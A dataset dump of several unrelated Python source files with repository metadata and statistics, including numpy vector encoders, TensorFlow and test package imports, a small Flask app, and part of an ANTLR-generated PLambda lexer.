| 0
| 0
| 0
| 1
|
0
| 6
|
79a34aa7cf6567dca5a9c5fdb417e953061c81f3
| 85
|
py
|
Python
|
tests/__init__.py
|
ogiaquino/scrapy-autounit
|
97f00d2d62c1ad49bbac462018907abe6a20e4cd
|
[
"BSD-3-Clause"
] | 48
|
2019-04-12T19:55:34.000Z
|
2022-03-12T06:47:45.000Z
|
tests/__init__.py
|
ogiaquino/scrapy-autounit
|
97f00d2d62c1ad49bbac462018907abe6a20e4cd
|
[
"BSD-3-Clause"
] | 60
|
2019-04-22T10:43:46.000Z
|
2021-07-16T15:36:44.000Z
|
tests/__init__.py
|
ogiaquino/scrapy-autounit
|
97f00d2d62c1ad49bbac462018907abe6a20e4cd
|
[
"BSD-3-Clause"
] | 13
|
2019-06-28T07:51:36.000Z
|
2020-12-17T16:37:19.000Z
|
from .test_middleware import DelAttrAutounitMiddleware, DelObjectsAutounitMiddleware
| 42.5
| 84
| 0.917647
| 6
| 85
| 12.833333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.058824
| 85
| 1
| 85
| 85
| 0.9625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
79b0e14eca9e059406dbc693264e1bf08caea487
| 1,591
|
py
|
Python
|
wolkenatlas/encoder.py
|
tttthomasssss/wolkenatlas
|
29e651e731daff4db4ca89373abd4837361979fa
|
[
"MIT"
] | 1
|
2021-03-30T11:55:42.000Z
|
2021-03-30T11:55:42.000Z
|
wolkenatlas/encoder.py
|
tttthomasssss/wolkenatlas
|
29e651e731daff4db4ca89373abd4837361979fa
|
[
"MIT"
] | 2
|
2020-04-21T21:19:56.000Z
|
2020-09-18T09:39:48.000Z
|
wolkenatlas/encoder.py
|
tttthomasssss/wolkenatlas
|
29e651e731daff4db4ca89373abd4837361979fa
|
[
"MIT"
] | null | null | null |
import numpy as np
def average_encoder(X):
return sum_encoder(X=X, normalise=True)
def sum_encoder(X, normalise=False):
if isinstance(X, list):
X = np.array(X)
if isinstance(X, np.ndarray):
if len(X.shape) > 1 and X.shape[0] > 1:
C = np.sum(X, axis=0) if not normalise else np.average(X, axis=0)
else:
C = X.reshape(-1,)
else:
C = None
return C
def max_encoder(X):
if isinstance(X, list):
X = np.array(X)
if isinstance(X, np.ndarray):
if len(X.shape) > 1 and X.shape[0] > 1:
C = np.max(X, axis=0)
else:
C = X.reshape(-1,)
else:
C = None
return C
def min_encoder(X):
if isinstance(X, list):
X = np.array(X)
if isinstance(X, np.ndarray):
if len(X.shape) > 1 and X.shape[0] > 1:
C = np.min(X, axis=0)
else:
C = X.reshape(-1,)
else:
C = None
return C
def concatenate_average_max_encoder(X):
A = average_encoder(X)
B = max_encoder(X)
return np.concatenate((A, B))
def concatenate_sum_max_encoder(X):
A = sum_encoder(X)
B = max_encoder(X)
return np.concatenate((A, B))
def concatenate_average_min_encoder(X):
A = average_encoder(X)
B = min_encoder(X)
return np.concatenate((A, B))
def concatenate_sum_min_encoder(X):
A = sum_encoder(X)
B = min_encoder(X)
return np.concatenate((A, B))
def concatenate_min_max_encoder(X):
A = max_encoder(X)
B = min_encoder(X)
return np.concatenate((A, B))
| 18.717647
| 77
| 0.567568
| 250
| 1,591
| 3.492
| 0.136
| 0.183276
| 0.088202
| 0.080183
| 0.776632
| 0.776632
| 0.776632
| 0.712486
| 0.712486
| 0.712486
| 0
| 0.014376
| 0.30044
| 1,591
| 85
| 78
| 18.717647
| 0.769991
| 0
| 0
| 0.732143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.160714
| false
| 0
| 0.017857
| 0.017857
| 0.339286
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
79d02635e051825abc02fd43db336b8abadad89c
| 35
|
py
|
Python
|
odoo-13.0/web_oca/web_dialog_size/tests/__init__.py
|
VaibhavBhujade/Blockchain-ERP-interoperability
|
b5190a037fb6615386f7cbad024d51b0abd4ba03
|
[
"MIT"
] | 1
|
2021-06-10T14:59:13.000Z
|
2021-06-10T14:59:13.000Z
|
odoo-13.0/web_oca/web_dialog_size/tests/__init__.py
|
VaibhavBhujade/Blockchain-ERP-interoperability
|
b5190a037fb6615386f7cbad024d51b0abd4ba03
|
[
"MIT"
] | null | null | null |
odoo-13.0/web_oca/web_dialog_size/tests/__init__.py
|
VaibhavBhujade/Blockchain-ERP-interoperability
|
b5190a037fb6615386f7cbad024d51b0abd4ba03
|
[
"MIT"
] | 1
|
2021-04-09T09:44:44.000Z
|
2021-04-09T09:44:44.000Z
|
from . import test_web_dialog_size
| 17.5
| 34
| 0.857143
| 6
| 35
| 4.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.114286
| 35
| 1
| 35
| 35
| 0.870968
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
8dafcba3937efe36996ce1dcc4f8b9a2da8a40d2
| 96
|
py
|
Python
|
venv/lib/python3.8/site-packages/requests/certs.py
|
Retraces/UkraineBot
|
3d5d7f8aaa58fa0cb8b98733b8808e5dfbdb8b71
|
[
"MIT"
] | 2
|
2022-03-13T01:58:52.000Z
|
2022-03-31T06:07:54.000Z
|
venv/lib/python3.8/site-packages/requests/certs.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | 19
|
2021-11-20T04:09:18.000Z
|
2022-03-23T15:05:55.000Z
|
venv/lib/python3.8/site-packages/requests/certs.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | null | null | null |
/home/runner/.cache/pip/pool/74/e0/79/ad5d83675ddd121abd0546bfe21779900aa0e7d7bfcd4641d347da633f
| 96
| 96
| 0.895833
| 9
| 96
| 9.555556
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.40625
| 0
| 96
| 1
| 96
| 96
| 0.489583
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
8dc919e8eb7168ee99c28c02679e3685903b6311
| 917
|
py
|
Python
|
Plugins/UnrealEnginePython/Binaries/Win64/Lib/site-packages/tensorflow/_api/v1/saved_model/constants/__init__.py
|
JustinACoder/H22-GR3-UnrealAI
|
361eb9ef1147f8a2991e5f98c4118cd823184adf
|
[
"MIT"
] | 6
|
2022-02-04T18:12:24.000Z
|
2022-03-21T23:57:12.000Z
|
Lib/site-packages/tensorflow/_api/v1/saved_model/constants/__init__.py
|
shfkdroal/Robot-Learning-in-Mixed-Adversarial-and-Collaborative-Settings
|
1fa4cd6a566c8745f455fc3d2273208f21f88ced
|
[
"bzip2-1.0.6"
] | null | null | null |
Lib/site-packages/tensorflow/_api/v1/saved_model/constants/__init__.py
|
shfkdroal/Robot-Learning-in-Mixed-Adversarial-and-Collaborative-Settings
|
1fa4cd6a566c8745f455fc3d2273208f21f88ced
|
[
"bzip2-1.0.6"
] | 1
|
2022-02-08T03:53:23.000Z
|
2022-02-08T03:53:23.000Z
|
# This file is MACHINE GENERATED! Do not edit.
# Generated by: tensorflow/python/tools/api/generator/create_python_api.py script.
"""Constants for SavedModel save and restore operations.
"""
from __future__ import print_function
from tensorflow.python.saved_model.constants import ASSETS_DIRECTORY
from tensorflow.python.saved_model.constants import ASSETS_KEY
from tensorflow.python.saved_model.constants import LEGACY_INIT_OP_KEY
from tensorflow.python.saved_model.constants import MAIN_OP_KEY
from tensorflow.python.saved_model.constants import SAVED_MODEL_FILENAME_PB
from tensorflow.python.saved_model.constants import SAVED_MODEL_FILENAME_PBTXT
from tensorflow.python.saved_model.constants import SAVED_MODEL_SCHEMA_VERSION
from tensorflow.python.saved_model.constants import VARIABLES_DIRECTORY
from tensorflow.python.saved_model.constants import VARIABLES_FILENAME
del print_function
| 43.666667
| 83
| 0.852781
| 125
| 917
| 5.976
| 0.36
| 0.160643
| 0.240964
| 0.301205
| 0.685408
| 0.685408
| 0.685408
| 0.685408
| 0.31593
| 0.168675
| 0
| 0
| 0.097056
| 917
| 20
| 84
| 45.85
| 0.902174
| 0.196292
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.909091
| 0
| 0.909091
| 0.181818
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
5c16f291962df1e24499d107592769c2b09f4f8a
| 165
|
py
|
Python
|
tests/cerami/__init__.py
|
gummybuns/dorm
|
e97c0baa42c4bdfb10bbe3b4b859873e3d50aa3a
|
[
"MIT"
] | null | null | null |
tests/cerami/__init__.py
|
gummybuns/dorm
|
e97c0baa42c4bdfb10bbe3b4b859873e3d50aa3a
|
[
"MIT"
] | null | null | null |
tests/cerami/__init__.py
|
gummybuns/dorm
|
e97c0baa42c4bdfb10bbe3b4b859873e3d50aa3a
|
[
"MIT"
] | null | null | null |
from .model_test import TestModelClass
from .request import *
from .datatype import *
from .response import *
from .reconstructor import *
from .decorators import *
| 23.571429
| 38
| 0.787879
| 20
| 165
| 6.45
| 0.5
| 0.310078
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.145455
| 165
| 6
| 39
| 27.5
| 0.914894
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
309aa91528f9711ccaa1043dfc1118339588ad15
| 189
|
py
|
Python
|
app.py
|
Blaze344/elementario
|
40edc5bc63e0c29da7a6635c47f1a0d63d2d720f
|
[
"MIT"
] | 1
|
2019-12-06T22:33:12.000Z
|
2019-12-06T22:33:12.000Z
|
app.py
|
Blaze344/elementario
|
40edc5bc63e0c29da7a6635c47f1a0d63d2d720f
|
[
"MIT"
] | null | null | null |
app.py
|
Blaze344/elementario
|
40edc5bc63e0c29da7a6635c47f1a0d63d2d720f
|
[
"MIT"
] | null | null | null |
from project import app
from flask import render_template
@app.route('/')
def index():
return "<h1>Página principal do backend. Você não deveria estar aqui.</h1>"
app.run(debug=True)
| 21
| 79
| 0.730159
| 29
| 189
| 4.724138
| 0.827586
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.012422
| 0.148148
| 189
| 9
| 80
| 21
| 0.838509
| 0
| 0
| 0
| 0
| 0
| 0.352632
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| true
| 0
| 0.333333
| 0.166667
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
a5132f795558e3729a319239d9cd8307505f5e6f
| 25,877
|
py
|
Python
|
plambda/antlr4/PLambdaLexer.py
|
SRI-CSL/PLambda
|
1aaacc1ddc2199c1b0a433cbb36875b4334ebeed
|
[
"MIT"
] | 2
|
2020-05-08T20:02:22.000Z
|
2020-08-25T11:55:10.000Z
|
plambda/antlr4/PLambdaLexer.py
|
SRI-CSL/PLambda
|
1aaacc1ddc2199c1b0a433cbb36875b4334ebeed
|
[
"MIT"
] | 2
|
2016-11-28T01:43:53.000Z
|
2020-05-18T19:53:15.000Z
|
plambda/antlr4/PLambdaLexer.py
|
SRI-CSL/PLambda
|
1aaacc1ddc2199c1b0a433cbb36875b4334ebeed
|
[
"MIT"
] | 5
|
2016-11-19T02:18:58.000Z
|
2020-12-16T09:56:13.000Z
|
# Generated from PLambda.g4 by ANTLR 4.8
from antlr4 import *
from io import StringIO
from typing.io import TextIO
import sys
def serializedATN():
with StringIO() as buf:
buf.write("\3\u608b\ua72a\u8133\ub9ed\u417c\u3be7\u7786\u5964\2D")
buf.write("\u026a\b\1\4\2\t\2\4\3\t\3\4\4\t\4\4\5\t\5\4\6\t\6\4\7")
buf.write("\t\7\4\b\t\b\4\t\t\t\4\n\t\n\4\13\t\13\4\f\t\f\4\r\t\r")
buf.write("\4\16\t\16\4\17\t\17\4\20\t\20\4\21\t\21\4\22\t\22\4\23")
buf.write("\t\23\4\24\t\24\4\25\t\25\4\26\t\26\4\27\t\27\4\30\t\30")
buf.write("\4\31\t\31\4\32\t\32\4\33\t\33\4\34\t\34\4\35\t\35\4\36")
buf.write("\t\36\4\37\t\37\4 \t \4!\t!\4\"\t\"\4#\t#\4$\t$\4%\t%")
buf.write("\4&\t&\4\'\t\'\4(\t(\4)\t)\4*\t*\4+\t+\4,\t,\4-\t-\4.")
buf.write("\t.\4/\t/\4\60\t\60\4\61\t\61\4\62\t\62\4\63\t\63\4\64")
buf.write("\t\64\4\65\t\65\4\66\t\66\4\67\t\67\48\t8\49\t9\4:\t:")
buf.write("\4;\t;\4<\t<\4=\t=\4>\t>\4?\t?\4@\t@\4A\tA\4B\tB\4C\t")
buf.write("C\4D\tD\4E\tE\4F\tF\4G\tG\3\2\3\2\3\3\3\3\3\4\3\4\5\4")
buf.write("\u0096\n\4\3\5\3\5\3\5\5\5\u009b\n\5\3\6\3\6\3\6\3\6\3")
buf.write("\6\3\6\3\6\3\6\3\6\3\6\3\6\5\6\u00a8\n\6\3\7\3\7\3\7\3")
buf.write("\7\3\7\3\7\3\7\3\7\3\7\3\7\3\7\3\7\3\7\3\7\3\7\5\7\u00b9")
buf.write("\n\7\3\b\3\b\3\b\3\b\3\b\5\b\u00c0\n\b\3\t\3\t\3\t\3\t")
buf.write("\3\t\3\t\5\t\u00c8\n\t\3\n\3\n\3\13\3\13\5\13\u00ce\n")
buf.write("\13\3\f\3\f\3\f\3\f\3\f\3\r\3\r\3\r\3\r\3\16\3\16\3\16")
buf.write("\3\17\3\17\3\17\3\17\3\20\3\20\3\20\3\20\3\20\3\20\3\20")
buf.write("\3\21\3\21\3\21\3\21\3\21\3\21\3\21\3\22\3\22\3\22\3\22")
buf.write("\3\22\3\22\3\23\3\23\3\23\3\23\3\23\3\23\3\23\3\24\3\24")
buf.write("\3\24\3\24\3\24\3\24\3\24\3\24\3\25\3\25\3\25\3\25\3\26")
buf.write("\3\26\3\26\3\26\3\27\3\27\3\27\3\27\3\27\3\27\3\30\3\30")
buf.write("\3\30\3\30\3\30\3\30\3\30\3\30\3\31\3\31\3\31\3\31\3\31")
buf.write("\3\31\3\32\3\32\3\32\3\32\3\33\3\33\3\33\3\33\3\33\3\34")
buf.write("\3\34\3\34\3\34\3\34\3\34\3\34\3\35\3\35\3\35\3\35\3\35")
buf.write("\3\35\3\35\3\36\3\36\3\36\3\36\3\36\3\36\3\36\3\36\3\36")
buf.write("\3\37\3\37\3\37\3\37\3\37\3\37\3 \3 \3 \3 \3 \3 \3 \3")
buf.write(" \3!\3!\3!\3!\3!\3!\3!\3\"\3\"\3\"\3\"\3\"\3\"\3\"\3#")
buf.write("\3#\3#\3#\3$\3$\3$\3$\3$\3$\3%\3%\3%\3%\3%\3%\3&\3&\3")
buf.write("&\3&\3&\3&\3&\3\'\3\'\3\'\3\'\3\'\3\'\3\'\3\'\3\'\3\'")
buf.write("\3\'\3(\3(\3(\3(\3)\3)\3)\3*\3*\3*\3+\3+\3+\3+\3+\3+\3")
buf.write("+\3,\3,\3,\3,\3,\3,\3,\3-\3-\3-\3-\3-\3-\3-\3-\3.\3.\3")
buf.write(".\3.\3.\3.\3.\3/\3/\3/\3/\3/\3/\3/\3\60\3\60\3\60\3\60")
buf.write("\3\60\3\60\3\60\3\60\3\61\3\61\3\61\3\61\3\61\3\61\3\61")
buf.write("\3\61\3\62\3\62\3\62\3\62\3\62\3\62\3\62\3\63\3\63\3\63")
buf.write("\3\63\3\64\3\64\3\64\3\65\3\65\3\65\3\65\3\65\3\65\3\65")
buf.write("\3\65\3\66\3\66\3\66\3\66\3\66\3\66\3\66\3\67\3\67\3\67")
buf.write("\3\67\3\67\3\67\3\67\38\38\39\39\39\3:\3:\3:\3:\3:\3:")
buf.write("\3:\3:\3;\3;\3;\5;\u01ef\n;\3;\3;\3;\7;\u01f4\n;\f;\16")
buf.write(";\u01f7\13;\3<\5<\u01fa\n<\3<\3<\6<\u01fe\n<\r<\16<\u01ff")
buf.write("\3<\6<\u0203\n<\r<\16<\u0204\3<\3<\7<\u0209\n<\f<\16<")
buf.write("\u020c\13<\5<\u020e\n<\5<\u0210\n<\3=\3=\3>\3>\3>\7>\u0217")
buf.write("\n>\f>\16>\u021a\13>\3>\3>\3?\3?\3?\3?\5?\u0222\n?\3@")
buf.write("\3@\3@\7@\u0227\n@\f@\16@\u022a\13@\3@\3@\3A\3A\3A\3A")
buf.write("\5A\u0232\nA\3B\3B\3C\3C\3D\3D\7D\u023a\nD\fD\16D\u023d")
buf.write("\13D\3D\5D\u0240\nD\3D\3D\3D\3D\3E\3E\3E\3E\7E\u024a\n")
buf.write("E\fE\16E\u024d\13E\3E\5E\u0250\nE\3E\3E\3E\3E\3F\3F\3")
buf.write("F\3F\7F\u025a\nF\fF\16F\u025d\13F\3F\3F\3F\3F\3F\3G\6")
buf.write("G\u0265\nG\rG\16G\u0266\3G\3G\7\u0218\u0228\u023b\u024b")
buf.write("\u025b\2H\3\3\5\4\7\5\t\6\13\7\r\b\17\t\21\n\23\13\25")
buf.write("\f\27\r\31\16\33\17\35\20\37\21!\22#\23%\24\'\25)\26+")
buf.write("\27-\30/\31\61\32\63\33\65\34\67\359\36;\37= ?!A\"C#E")
buf.write("$G%I&K\'M(O)Q*S+U,W-Y.[/]\60_\61a\62c\63e\64g\65i\66k")
buf.write("\67m8o9q:s;u<w=y\2{>}\2\177?\u0081\2\u0083\2\u0085@\u0087")
buf.write("A\u0089B\u008bC\u008dD\3\2\37\7\2\'\',-\61\61>>@@\4\2")
buf.write("UUuu\4\2GGgg\4\2SSss\4\2FFff\4\2QQqq\4\2NNnn\4\2VVvv\4")
buf.write("\2HHhh\4\2KKkk\4\2PPpp\4\2CCcc\4\2OOoo\4\2DDdd\4\2RRr")
buf.write("r\4\2[[{{\4\2XXxx\4\2MMmm\4\2TTtt\4\2EEee\4\2JJjj\4\2")
buf.write("LLll\4\2IIii\4\2WWww\4\2YYyy\3\2\62;\6\2C\\aac|\u0082")
buf.write("\u0101\f\2##%&((,,/\61<=AB]]_a}\u0080\5\2\13\f\17\17\"")
buf.write("\"\2\u029d\2\3\3\2\2\2\2\5\3\2\2\2\2\7\3\2\2\2\2\t\3\2")
buf.write("\2\2\2\13\3\2\2\2\2\r\3\2\2\2\2\17\3\2\2\2\2\21\3\2\2")
buf.write("\2\2\23\3\2\2\2\2\25\3\2\2\2\2\27\3\2\2\2\2\31\3\2\2\2")
buf.write("\2\33\3\2\2\2\2\35\3\2\2\2\2\37\3\2\2\2\2!\3\2\2\2\2#")
buf.write("\3\2\2\2\2%\3\2\2\2\2\'\3\2\2\2\2)\3\2\2\2\2+\3\2\2\2")
buf.write("\2-\3\2\2\2\2/\3\2\2\2\2\61\3\2\2\2\2\63\3\2\2\2\2\65")
buf.write("\3\2\2\2\2\67\3\2\2\2\29\3\2\2\2\2;\3\2\2\2\2=\3\2\2\2")
buf.write("\2?\3\2\2\2\2A\3\2\2\2\2C\3\2\2\2\2E\3\2\2\2\2G\3\2\2")
buf.write("\2\2I\3\2\2\2\2K\3\2\2\2\2M\3\2\2\2\2O\3\2\2\2\2Q\3\2")
buf.write("\2\2\2S\3\2\2\2\2U\3\2\2\2\2W\3\2\2\2\2Y\3\2\2\2\2[\3")
buf.write("\2\2\2\2]\3\2\2\2\2_\3\2\2\2\2a\3\2\2\2\2c\3\2\2\2\2e")
buf.write("\3\2\2\2\2g\3\2\2\2\2i\3\2\2\2\2k\3\2\2\2\2m\3\2\2\2\2")
buf.write("o\3\2\2\2\2q\3\2\2\2\2s\3\2\2\2\2u\3\2\2\2\2w\3\2\2\2")
buf.write("\2{\3\2\2\2\2\177\3\2\2\2\2\u0085\3\2\2\2\2\u0087\3\2")
buf.write("\2\2\2\u0089\3\2\2\2\2\u008b\3\2\2\2\2\u008d\3\2\2\2\3")
buf.write("\u008f\3\2\2\2\5\u0091\3\2\2\2\7\u0095\3\2\2\2\t\u009a")
buf.write("\3\2\2\2\13\u00a7\3\2\2\2\r\u00b8\3\2\2\2\17\u00bf\3\2")
buf.write("\2\2\21\u00c7\3\2\2\2\23\u00c9\3\2\2\2\25\u00cd\3\2\2")
buf.write("\2\27\u00cf\3\2\2\2\31\u00d4\3\2\2\2\33\u00d8\3\2\2\2")
buf.write("\35\u00db\3\2\2\2\37\u00df\3\2\2\2!\u00e6\3\2\2\2#\u00ed")
buf.write("\3\2\2\2%\u00f3\3\2\2\2\'\u00fa\3\2\2\2)\u0102\3\2\2\2")
buf.write("+\u0106\3\2\2\2-\u010a\3\2\2\2/\u0110\3\2\2\2\61\u0118")
buf.write("\3\2\2\2\63\u011e\3\2\2\2\65\u0122\3\2\2\2\67\u0127\3")
buf.write("\2\2\29\u012e\3\2\2\2;\u0135\3\2\2\2=\u013e\3\2\2\2?\u0144")
buf.write("\3\2\2\2A\u014c\3\2\2\2C\u0153\3\2\2\2E\u015a\3\2\2\2")
buf.write("G\u015e\3\2\2\2I\u0164\3\2\2\2K\u016a\3\2\2\2M\u0171\3")
buf.write("\2\2\2O\u017c\3\2\2\2Q\u0180\3\2\2\2S\u0183\3\2\2\2U\u0186")
buf.write("\3\2\2\2W\u018d\3\2\2\2Y\u0194\3\2\2\2[\u019c\3\2\2\2")
buf.write("]\u01a3\3\2\2\2_\u01aa\3\2\2\2a\u01b2\3\2\2\2c\u01ba\3")
buf.write("\2\2\2e\u01c1\3\2\2\2g\u01c5\3\2\2\2i\u01c8\3\2\2\2k\u01d0")
buf.write("\3\2\2\2m\u01d7\3\2\2\2o\u01de\3\2\2\2q\u01e0\3\2\2\2")
buf.write("s\u01e3\3\2\2\2u\u01ee\3\2\2\2w\u01f9\3\2\2\2y\u0211\3")
buf.write("\2\2\2{\u0213\3\2\2\2}\u0221\3\2\2\2\177\u0223\3\2\2\2")
buf.write("\u0081\u0231\3\2\2\2\u0083\u0233\3\2\2\2\u0085\u0235\3")
buf.write("\2\2\2\u0087\u0237\3\2\2\2\u0089\u0245\3\2\2\2\u008b\u0255")
buf.write("\3\2\2\2\u008d\u0264\3\2\2\2\u008f\u0090\7*\2\2\u0090")
buf.write("\4\3\2\2\2\u0091\u0092\7+\2\2\u0092\6\3\2\2\2\u0093\u0096")
buf.write("\5\177@\2\u0094\u0096\5{>\2\u0095\u0093\3\2\2\2\u0095")
buf.write("\u0094\3\2\2\2\u0096\b\3\2\2\2\u0097\u009b\5\63\32\2\u0098")
buf.write("\u009b\5\61\31\2\u0099\u009b\5/\30\2\u009a\u0097\3\2\2")
buf.write("\2\u009a\u0098\3\2\2\2\u009a\u0099\3\2\2\2\u009b\n\3\2")
buf.write("\2\2\u009c\u00a8\5I%\2\u009d\u00a8\5A!\2\u009e\u00a8\5")
buf.write("C\"\2\u009f\u00a8\5\67\34\2\u00a0\u00a8\59\35\2\u00a1")
buf.write("\u00a8\5;\36\2\u00a2\u00a8\5=\37\2\u00a3\u00a8\5? \2\u00a4")
buf.write("\u00a8\5\65\33\2\u00a5\u00a8\5E#\2\u00a6\u00a8\5G$\2\u00a7")
buf.write("\u009c\3\2\2\2\u00a7\u009d\3\2\2\2\u00a7\u009e\3\2\2\2")
buf.write("\u00a7\u009f\3\2\2\2\u00a7\u00a0\3\2\2\2\u00a7\u00a1\3")
buf.write("\2\2\2\u00a7\u00a2\3\2\2\2\u00a7\u00a3\3\2\2\2\u00a7\u00a4")
buf.write("\3\2\2\2\u00a7\u00a5\3\2\2\2\u00a7\u00a6\3\2\2\2\u00a8")
buf.write("\f\3\2\2\2\u00a9\u00b9\t\2\2\2\u00aa\u00ab\7>\2\2\u00ab")
buf.write("\u00b9\7?\2\2\u00ac\u00ad\7@\2\2\u00ad\u00b9\7?\2\2\u00ae")
buf.write("\u00b9\5Q)\2\u00af\u00b9\5S*\2\u00b0\u00b1\7?\2\2\u00b1")
buf.write("\u00b9\7?\2\2\u00b2\u00b9\7?\2\2\u00b3\u00b4\7#\2\2\u00b4")
buf.write("\u00b9\7?\2\2\u00b5\u00b9\5O(\2\u00b6\u00b9\5W,\2\u00b7")
buf.write("\u00b9\5U+\2\u00b8\u00a9\3\2\2\2\u00b8\u00aa\3\2\2\2\u00b8")
buf.write("\u00ac\3\2\2\2\u00b8\u00ae\3\2\2\2\u00b8\u00af\3\2\2\2")
buf.write("\u00b8\u00b0\3\2\2\2\u00b8\u00b2\3\2\2\2\u00b8\u00b3\3")
buf.write("\2\2\2\u00b8\u00b5\3\2\2\2\u00b8\u00b6\3\2\2\2\u00b8\u00b7")
buf.write("\3\2\2\2\u00b9\16\3\2\2\2\u00ba\u00c0\5Y-\2\u00bb\u00c0")
buf.write("\5[.\2\u00bc\u00c0\5]/\2\u00bd\u00c0\5_\60\2\u00be\u00c0")
buf.write("\5a\61\2\u00bf\u00ba\3\2\2\2\u00bf\u00bb\3\2\2\2\u00bf")
buf.write("\u00bc\3\2\2\2\u00bf\u00bd\3\2\2\2\u00bf\u00be\3\2\2\2")
buf.write("\u00c0\20\3\2\2\2\u00c1\u00c8\5c\62\2\u00c2\u00c8\5e\63")
buf.write("\2\u00c3\u00c8\5g\64\2\u00c4\u00c8\5i\65\2\u00c5\u00c8")
buf.write("\5k\66\2\u00c6\u00c8\5m\67\2\u00c7\u00c1\3\2\2\2\u00c7")
buf.write("\u00c2\3\2\2\2\u00c7\u00c3\3\2\2\2\u00c7\u00c4\3\2\2\2")
buf.write("\u00c7\u00c5\3\2\2\2\u00c7\u00c6\3\2\2\2\u00c8\22\3\2")
buf.write("\2\2\u00c9\u00ca\5o8\2\u00ca\24\3\2\2\2\u00cb\u00ce\5")
buf.write("q9\2\u00cc\u00ce\5s:\2\u00cd\u00cb\3\2\2\2\u00cd\u00cc")
buf.write("\3\2\2\2\u00ce\26\3\2\2\2\u00cf\u00d0\7P\2\2\u00d0\u00d1")
buf.write("\7q\2\2\u00d1\u00d2\7p\2\2\u00d2\u00d3\7g\2\2\u00d3\30")
buf.write("\3\2\2\2\u00d4\u00d5\t\3\2\2\u00d5\u00d6\t\4\2\2\u00d6")
buf.write("\u00d7\t\5\2\2\u00d7\32\3\2\2\2\u00d8\u00d9\t\6\2\2\u00d9")
buf.write("\u00da\t\7\2\2\u00da\34\3\2\2\2\u00db\u00dc\t\b\2\2\u00dc")
buf.write("\u00dd\t\4\2\2\u00dd\u00de\t\t\2\2\u00de\36\3\2\2\2\u00df")
buf.write("\u00e0\t\6\2\2\u00e0\u00e1\t\4\2\2\u00e1\u00e2\t\n\2\2")
buf.write("\u00e2\u00e3\t\13\2\2\u00e3\u00e4\t\f\2\2\u00e4\u00e5")
buf.write("\t\4\2\2\u00e5 \3\2\2\2\u00e6\u00e7\t\b\2\2\u00e7\u00e8")
buf.write("\t\r\2\2\u00e8\u00e9\t\16\2\2\u00e9\u00ea\t\17\2\2\u00ea")
buf.write("\u00eb\t\6\2\2\u00eb\u00ec\t\r\2\2\u00ec\"\3\2\2\2\u00ed")
buf.write("\u00ee\t\r\2\2\u00ee\u00ef\t\20\2\2\u00ef\u00f0\t\20\2")
buf.write("\2\u00f0\u00f1\t\b\2\2\u00f1\u00f2\t\21\2\2\u00f2$\3\2")
buf.write("\2\2\u00f3\u00f4\t\13\2\2\u00f4\u00f5\t\f\2\2\u00f5\u00f6")
